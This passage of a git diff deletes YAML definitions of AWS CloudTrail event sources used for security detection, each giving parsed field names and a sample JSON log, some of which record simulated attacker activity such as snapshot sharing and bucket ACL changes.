-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDASBMSCQHHTH5NDF4GD", "arn": "arn:aws:iam::111111111111:user/strt_fonder", "accountId": "111111111111", "accessKeyId": "AKIASBMSCQHH5A5NJDM5", "userName": "strt_fonder"}, "eventTime": "2023-01-26T22:39:06Z", "eventSource": "iam.amazonaws.com", "eventName": "GetAccountPasswordPolicy", "awsRegion": "us-east-1", "sourceIPAddress": "23.93.193.7", "userAgent": "aws-cli/2.7.25 Python/3.10.6 Darwin/21.6.0 source/x86_64 prompt/off command/iam.get-account-password-policy", "requestParameters": null, "responseElements": null, "requestID": "098fd0dd-e42e-4249-91fb-9637925bf2fe", "eventID": "5eb0fb9b-18ff-4be9-b90d-107a290e1d5c", "readOnly": true, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "iam.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_GetObject.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_GetObject.yml
deleted file mode 100644
index c2ca9e8a5d..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_GetObject.yml
+++ /dev/null
@@ -1,85 +0,0 @@
-event_name: AWS CloudTrail GetObject
-fields:
-- _time
-- additionalEventData.AuthenticationMethod
-- additionalEventData.CipherSuite
-- additionalEventData.SignatureVersion
-- additionalEventData.bytesTransferredIn
-- additionalEventData.bytesTransferredOut
-- additionalEventData.x-amz-id-2
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.Host
-- requestParameters.bucketName
-- requestParameters.key
-- requestParameters.x-amz-request-payer
-- resources{}.ARN
-- resources{}.accountId
-- resources{}.type
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLCNEAQXWZV", "arn": "arn:aws:iam::111111111111:user/console", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLF5EAXXXX", "userName": "console"}, "eventTime": "2023-04-11T01:18:47Z", "eventSource": "s3.amazonaws.com", "eventName": "GetObject", "awsRegion": "us-west-2", "sourceIPAddress": "12.26.0.38", "userAgent": "[aws-cli/2.11.2 Python/3.11.2 Darwin/22.3.0 exe/x86_64 prompt/off command/s3.cp]", "requestParameters": {"bucketName": "security-content", "Host": "security-content.s3.us-west-2.amazonaws.com", "x-amz-request-payer": "requester", "key": "stories/windows_discovery_techniques.yml"}, "responseElements": null, "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "bytesTransferredIn": 0, "AuthenticationMethod": "AuthHeader", "x-amz-id-2": "dcha0yrujT+O4FHsYxHx48KxMk4+wtO7MaNRwFOFs46R1PynKWcCsbLScYEFytN+Vt35hyq1cek=", "bytesTransferredOut": 1136}, "requestID": "GVSEBM08Z93FB3BT", "eventID": "2b7231c2-892d-464e-8880-1e4f81ae7eb2", "readOnly": true, "resources": [{"type": "AWS::S3::Object", "ARN": "arn:aws:s3:::security-content/stories/windows_discovery_techniques.yml"}, {"accountId": "111111111111", "type": "AWS::S3::Bucket", "ARN": "arn:aws:s3:::security-content"}], "eventType": "AwsApiCall", "managementEvent": false, "recipientAccountId": "111111111111", "eventCategory": "Data", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "security-content.s3.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_GetPasswordData.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_GetPasswordData.yml
deleted file mode 100644
index 223f2d58a0..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_GetPasswordData.yml
+++ /dev/null
@@ -1,87 +0,0 @@
-event_name: AWS CloudTrail GetPasswordData
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- errorMessage
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- reason
-- recipientAccountId
-- region
-- requestID
-- requestParameters.instanceId
-- responseElements
-- result
-- result_id
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAYTOGP2RLP5AASA6I5:aws-go-sdk-1660169051746043000", "arn": "arn:aws:sts::111111111111:assumed-role/sample-role-used-by-stratus-for-ec2-password-data/aws-go-sdk-1660169051746043000", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLLY5RQXEF", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLP5AASA6I5", "arn": "arn:aws:iam::111111111111:role/sample-role-used-by-stratus-for-ec2-password-data", "accountId": "111111111111", "userName": "sample-role-used-by-stratus-for-ec2-password-data"}, "webIdFederationData": {}, "attributes": {"creationDate": "2022-08-10T22:04:12Z", "mfaAuthenticated": "false"}}}, "eventTime": "2022-08-10T22:04:13Z", "eventSource": "ec2.amazonaws.com", "eventName": "GetPasswordData", "awsRegion": "us-west-2", "sourceIPAddress": "142.254.89.27", "userAgent": "stratus-red-team_e3e4b259-63a4-4d89-acd5-a7286a279bb8", "errorCode": "Client.UnauthorizedOperation", "errorMessage": "You are not authorized to perform this operation. 
Encoded authorization failure message: OwnXKlWs2vtfsyXhkYTFO35PfDwIeH4oGadP2dmbdguXBDpSfP-65XwZU4JdWht_u8p9BlgIZ0QOYIzmm5-ApXc7HsgOynmQvF4vFNUxxiuY0w-VRNBiuPmphwnJqYln8pTJogn0DfcleY5TIuDEFwmGvZHnGMmK1kXJ1VcUiQvbK_vuDpSqIDFz-jqcnOTjzsC4DXlTZkHLL1HEeNVIjI9HCEWYG4CuG9Ti8BQ0AnGVkU8oqvtS6iyVlnPI9oId5_AWpfmE1ijhNKbgFH77DjRn6QyR5rGkGYYFpvaIyMvX33Vti4RzfAyJdpuzMgp6tV-q_Rbh0ikwBJvUtiiGfmqzdQynfRNDQmXJ3ruifOjGmUz34M90SGFJKi5CVHGThtO3UWj9EqYXpKdu_JgTYEqxWvRBopB--V7tOap8XKuz7W3rWyHN2clHA0yooLZ3DV34LWgzzDp9Iv66829HSTwGz7h2P0sGdCNuV_FCxwQzWYa8f6_h1By90MvWUvmEDLSzOfA_PF6BcqCmV8XBiPUvCMPebDSGmPwSa371J5Yn2xEiuQadfuNYRLZnd2i1V_NF9ax67BdZ", "requestParameters": {"instanceId": "i-7sap2krlslv6adrs"}, "responseElements": null, "requestID": "87368810-7b30-4ff9-b097-702778a53f22", "eventID": "0cdd3757-296a-4454-9619-d0f8be335081", "readOnly": true, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "ec2.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_JobCreated.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_JobCreated.yml
deleted file mode 100644
index cbca0ff2f0..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_JobCreated.yml
+++ /dev/null
@@ -1,63 +0,0 @@
-event_name: AWS CloudTrail JobCreated
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- desc
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestParameters
-- responseElements
-- serviceEventDetails.jobArn
-- serviceEventDetails.jobEventId
-- serviceEventDetails.jobId
-- serviceEventDetails.status
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- userAgent
-- userIdentity.accountId
-- userIdentity.invokedBy
-- user_agent
-- user_group_id
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"accountId": "111111111111", "invokedBy": "s3.amazonaws.com"}, "eventTime": "2023-04-24T23:51:17Z", "eventSource": "s3.amazonaws.com", "eventName": "JobCreated", "awsRegion": "us-west-2", "sourceIPAddress": "s3.amazonaws.com", "userAgent": "s3.amazonaws.com", "requestParameters": null, "responseElements": null, "eventID": "894153ad-ed86-4719-bb66-6c52ef7dc767", "readOnly": false, "eventType": "AwsServiceEvent", "managementEvent": true, "recipientAccountId": "111111111111", "serviceEventDetails": {"jobId": "bb54efd8-937d-4f0c-967d-aa8443998dac", "jobArn": "arn:aws:s3:us-west-2:111111111111:job/bb54efd8-937d-4f0c-967d-aa8443998dac", "status": "New", "jobEventId": "4e70d2f1053c07a79d9be9a14e486020", "failureCodes": [], "statusChangeReason": []}, "eventCategory": "Management"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_ModifyDBInstance.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_ModifyDBInstance.yml
deleted file mode 100644
index e604221b36..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_ModifyDBInstance.yml
+++ /dev/null
@@ -1,135 +0,0 @@
-event_name: AWS CloudTrail ModifyDBInstance
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.allowMajorVersionUpgrade
-- requestParameters.applyImmediately
-- requestParameters.dBInstanceIdentifier
-- requestParameters.deletionProtection
-- requestParameters.masterUserPassword
-- responseElements.allocatedStorage
-- responseElements.autoMinorVersionUpgrade
-- responseElements.availabilityZone
-- responseElements.backupRetentionPeriod
-- responseElements.backupTarget
-- responseElements.cACertificateIdentifier
-- responseElements.copyTagsToSnapshot
-- responseElements.customerOwnedIpEnabled
-- responseElements.dBInstanceArn
-- responseElements.dBInstanceClass
-- responseElements.dBInstanceIdentifier
-- responseElements.dBInstanceStatus
-- responseElements.dBParameterGroups{}.dBParameterGroupName
-- responseElements.dBParameterGroups{}.parameterApplyStatus
-- responseElements.dBSubnetGroup.dBSubnetGroupDescription
-- responseElements.dBSubnetGroup.dBSubnetGroupName
-- responseElements.dBSubnetGroup.subnetGroupStatus
-- responseElements.dBSubnetGroup.subnets{}.subnetAvailabilityZone.name
-- responseElements.dBSubnetGroup.subnets{}.subnetIdentifier
-- responseElements.dBSubnetGroup.subnets{}.subnetStatus
-- responseElements.dBSubnetGroup.vpcId
-- responseElements.dbInstancePort
-- responseElements.dbiResourceId
-- responseElements.deletionProtection
-- responseElements.endpoint.address
-- responseElements.endpoint.hostedZoneId
-- responseElements.endpoint.port
-- responseElements.engine
-- responseElements.engineVersion
-- responseElements.enhancedMonitoringResourceArn
-- responseElements.httpEndpointEnabled
-- responseElements.iAMDatabaseAuthenticationEnabled
-- responseElements.instanceCreateTime
-- responseElements.kmsKeyId
-- responseElements.latestRestorableTime
-- responseElements.licenseModel
-- responseElements.masterUsername
-- responseElements.monitoringInterval
-- responseElements.monitoringRoleArn
-- responseElements.multiAZ
-- responseElements.networkType
-- responseElements.optionGroupMemberships{}.optionGroupName
-- responseElements.optionGroupMemberships{}.status
-- responseElements.pendingModifiedValues.masterUserPassword
-- responseElements.performanceInsightsEnabled
-- responseElements.performanceInsightsKMSKeyId
-- responseElements.performanceInsightsRetentionPeriod
-- responseElements.preferredBackupWindow
-- responseElements.preferredMaintenanceWindow
-- responseElements.publiclyAccessible
-- responseElements.storageEncrypted
-- responseElements.storageThroughput
-- responseElements.storageType
-- responseElements.vpcSecurityGroups{}.status
-- responseElements.vpcSecurityGroups{}.vpcSecurityGroupId
-- sessionCredentialFromConsole
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAYTOGP2RLDF6WP4HD6:gowthamarajr@splunk.com", "arn": "arn:aws:sts::111111111111:assumed-role/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f/gowthamarajr@splunk.com", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLAKJDBQGB", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLDF6WP4HD6", "arn": "arn:aws:iam::111111111111:role/aws-reserved/sso.amazonaws.com/us-west-2/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f", "accountId": "111111111111", "userName": "AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f"}, "webIdFederationData": {}, "attributes": {"creationDate": "2022-08-05T08:47:55Z", "mfaAuthenticated": "false"}}}, "eventTime": "2022-08-05T09:19:15Z", "eventSource": "rds.amazonaws.com", "eventName": "ModifyDBInstance", "awsRegion": "us-west-2", "sourceIPAddress": "AWS Internal", "userAgent": "AWS Internal", "requestParameters": {"dBInstanceIdentifier": "database-1", "applyImmediately": true, "masterUserPassword": "****", "allowMajorVersionUpgrade": false, "deletionProtection": true}, "responseElements": {"dBInstanceIdentifier": "database-1", "dBInstanceClass": "db.m6g.large", "engine": "postgres", "dBInstanceStatus": "available", "masterUsername": "postgres", "endpoint": {"address": "database-1.ce6wk5bvtc0t.us-west-2.rds.amazonaws.com", "port": 5432, "hostedZoneId": "Z1PVIF0B656C1W"}, "allocatedStorage": 5, "instanceCreateTime": "Aug 5, 2022 9:02:51 AM", "preferredBackupWindow": "06:35-07:05", "backupRetentionPeriod": 7, "dBSecurityGroups": [], "vpcSecurityGroups": [{"vpcSecurityGroupId": "sg-46cfd020", "status": "active"}], "dBParameterGroups": [{"dBParameterGroupName": "default.postgres14", "parameterApplyStatus": "in-sync"}], "availabilityZone": "us-west-2a", "dBSubnetGroup": {"dBSubnetGroupName": "default", "dBSubnetGroupDescription": "default", "vpcId": "vpc-5f02343b", "subnetGroupStatus": 
"Complete", "subnets": [{"subnetIdentifier": "subnet-43225f35", "subnetAvailabilityZone": {"name": "us-west-2b"}, "subnetOutpost": {}, "subnetStatus": "Active"}, {"subnetIdentifier": "subnet-e55d7881", "subnetAvailabilityZone": {"name": "us-west-2a"}, "subnetOutpost": {}, "subnetStatus": "Active"}, {"subnetIdentifier": "subnet-0beddb972f034bdaa", "subnetAvailabilityZone": {"name": "us-west-2c"}, "subnetOutpost": {}, "subnetStatus": "Active"}, {"subnetIdentifier": "subnet-2d70cd75", "subnetAvailabilityZone": {"name": "us-west-2c"}, "subnetOutpost": {}, "subnetStatus": "Active"}]}, "preferredMaintenanceWindow": "sat:11:44-sat:12:14", "pendingModifiedValues": {"masterUserPassword": "****"}, "latestRestorableTime": "Aug 5, 2022 9:12:31 AM", "multiAZ": false, "engineVersion": "14.2", "autoMinorVersionUpgrade": true, "readReplicaDBInstanceIdentifiers": [], "licenseModel": "postgresql-license", "storageThroughput": 0, "optionGroupMemberships": [{"optionGroupName": "default:postgres-14", "status": "in-sync"}], "publiclyAccessible": false, "storageType": "standard", "dbInstancePort": 0, "storageEncrypted": true, "kmsKeyId": "arn:aws:kms:us-west-2:111111111111:key/318bcd5d-c453-489d-b63a-07753eab0623", "dbiResourceId": "db-IX2K4LYFLBVZDHBYNPEAVFHFQM", "cACertificateIdentifier": "rds-ca-2019", "domainMemberships": [], "copyTagsToSnapshot": true, "monitoringInterval": 60, "enhancedMonitoringResourceArn": "arn:aws:logs:us-west-2:111111111111:log-group:RDSOSMetrics:log-stream:db-IX2K4LYFLBVZDHBYNPEAVFHFQM", "monitoringRoleArn": "arn:aws:iam::111111111111:role/rds-monitoring-role", "dBInstanceArn": "arn:aws:rds:us-west-2:111111111111:db:database-1", "iAMDatabaseAuthenticationEnabled": false, "performanceInsightsEnabled": true, "performanceInsightsKMSKeyId": "arn:aws:kms:us-west-2:111111111111:key/318bcd5d-c453-489d-b63a-07753eab0623", "performanceInsightsRetentionPeriod": 7, "deletionProtection": true, "associatedRoles": [], "httpEndpointEnabled": false, "tagList": [], 
"customerOwnedIpEnabled": false, "networkType": "IPV4", "backupTarget": "region"}, "requestID": "59e6b621-2f12-415b-bde4-21fa2dc7c113", "eventID": "46351ca1-760e-4eef-b3ff-19723e13fbf8", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_ModifyImageAttribute.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_ModifyImageAttribute.yml
deleted file mode 100644
index 30a54506b4..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_ModifyImageAttribute.yml
+++ /dev/null
@@ -1,81 +0,0 @@
-event_name: AWS CloudTrail ModifyImageAttribute
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.attributeType
-- requestParameters.imageId
-- requestParameters.launchPermission.add.items{}.userId
-- responseElements._return
-- responseElements.requestId
-- sessionCredentialFromConsole
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAYTOGP2RLDF6WP4HD6:bonobo@bo.com", "arn": "arn:aws:sts::111111111111:assumed-role/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f/bonobo@bo.com", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLBHIEEEPN", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLDF6WP4HD6", "arn": "arn:aws:iam::111111111111:role/aws-reserved/sso.amazonaws.com/us-west-2/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f", "accountId": "111111111111", "userName": "AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f"}, "webIdFederationData": {}, "attributes": {"creationDate": "2023-03-23T19:27:44Z", "mfaAuthenticated": "false"}}}, "eventTime": "2023-03-23T21:47:28Z", "eventSource": "ec2.amazonaws.com", "eventName": "ModifyImageAttribute", "awsRegion": "us-west-2", "sourceIPAddress": "72.135.245.10", "userAgent": "AWS Internal", "requestParameters": {"imageId": "ami-06dac31db29508566", "launchPermission": {"add": {"items": [{"userId": "140429656527"}]}}, "attributeType": "launchPermission"}, "responseElements": {"requestId": "84c431ce-6268-4218-aaf8-b4cdc1cd4055", "_return": true}, "requestID": "84c431ce-6268-4218-aaf8-b4cdc1cd4055", "eventID": "957e1b12-ea17-4006-aefd-20677ace72b8", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_ModifySnapshotAttribute.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_ModifySnapshotAttribute.yml
deleted file mode 100644
index e9c77b5b6e..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_ModifySnapshotAttribute.yml
+++ /dev/null
@@ -1,77 +0,0 @@
-event_name: AWS CloudTrail ModifySnapshotAttribute
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.attributeType
-- requestParameters.createVolumePermission.add.items{}.userId
-- requestParameters.snapshotId
-- responseElements._return
-- responseElements.requestId
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLCNEAQXWZV", "arn": "arn:aws:iam::111111111111:user/bhavin_console", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLF5EAXXXX", "userName": "bhavin_console"}, "eventTime": "2023-03-20T22:31:36Z", "eventSource": "ec2.amazonaws.com", "eventName": "ModifySnapshotAttribute", "awsRegion": "us-west-2", "sourceIPAddress": "72.135.1.1", "userAgent": "stratus-red-team_46665bb8-dc15-4aba-a5ad-a362772b3f0d", "requestParameters": {"snapshotId": "snap-02effb3bb62786b18", "createVolumePermission": {"add": {"items": [{"userId": "012345678912"}]}}, "attributeType": "CREATE_VOLUME_PERMISSION"}, "responseElements": {"requestId": "f58433e6-a7f4-4e63-9cba-7ecc60ab74b2", "_return": true}, "requestID": "f58433e6-a7f4-4e63-9cba-7ecc60ab74b2", "eventID": "62e027d3-7191-48f4-b5fe-4b66c58b3008", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "ec2.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketAcl.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketAcl.yml
deleted file mode 100644
index a9bb8975ae..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketAcl.yml
+++ /dev/null
@@ -1,90 +0,0 @@
-event_name: AWS CloudTrail PutBucketAcl
-fields:
-- _time
-- action
-- additionalEventData.AuthenticationMethod
-- additionalEventData.CipherSuite
-- additionalEventData.SignatureVersion
-- additionalEventData.bytesTransferredIn
-- additionalEventData.bytesTransferredOut
-- additionalEventData.x-amz-id-2
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object
-- object_category
-- object_id
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.Host
-- requestParameters.accessControlList.x-amz-grant-write-acp
-- requestParameters.acl
-- requestParameters.bucketName
-- resources{}.ARN
-- resources{}.accountId
-- resources{}.type
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_user
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLNALZHZ6KX", "arn": "arn:aws:iam::111111111111:user/patrick_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLJ2OYSF6E", "userName": "patrick_cli"}, "eventTime": "2021-01-12T14:03:17Z", "eventSource": "s3.amazonaws.com", "eventName": "PutBucketAcl", "awsRegion": "eu-central-1", "sourceIPAddress": "95.90.199.65", "userAgent": "[aws-cli/2.0.45 Python/3.7.4 Darwin/20.2.0 exe/x86_64 command/s3api.put-bucket-acl]", "requestParameters": {"bucketName": "patricktestbucket19", "Host": "patricktestbucket19.s3.eu-central-1.amazonaws.com", "acl": "", "accessControlList": {"x-amz-grant-write-acp": "uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers"}}, "responseElements": null, "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "bytesTransferredIn": 0, "AuthenticationMethod": "AuthHeader", "x-amz-id-2": "qb+xR18y4+4serdq8conds+tNROklOFRYciGHof4z1pcnTnT9SCrx6iYHuupPNaiMnZ9kdB43yE=", "bytesTransferredOut": 0}, "requestID": "23FAB394417ECFCD", "eventID": "9feee3c9-711f-4f7d-af4c-992907a2a521", "readOnly": false, "resources": [{"accountId": "111111111111", "type": "AWS::S3::Bucket", "ARN": "arn:aws:s3:::patricktestbucket19"}], "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketLifecycle.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketLifecycle.yml
deleted file mode 100644
index 33f63e49b6..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketLifecycle.yml
+++ /dev/null
@@ -1,91 +0,0 @@
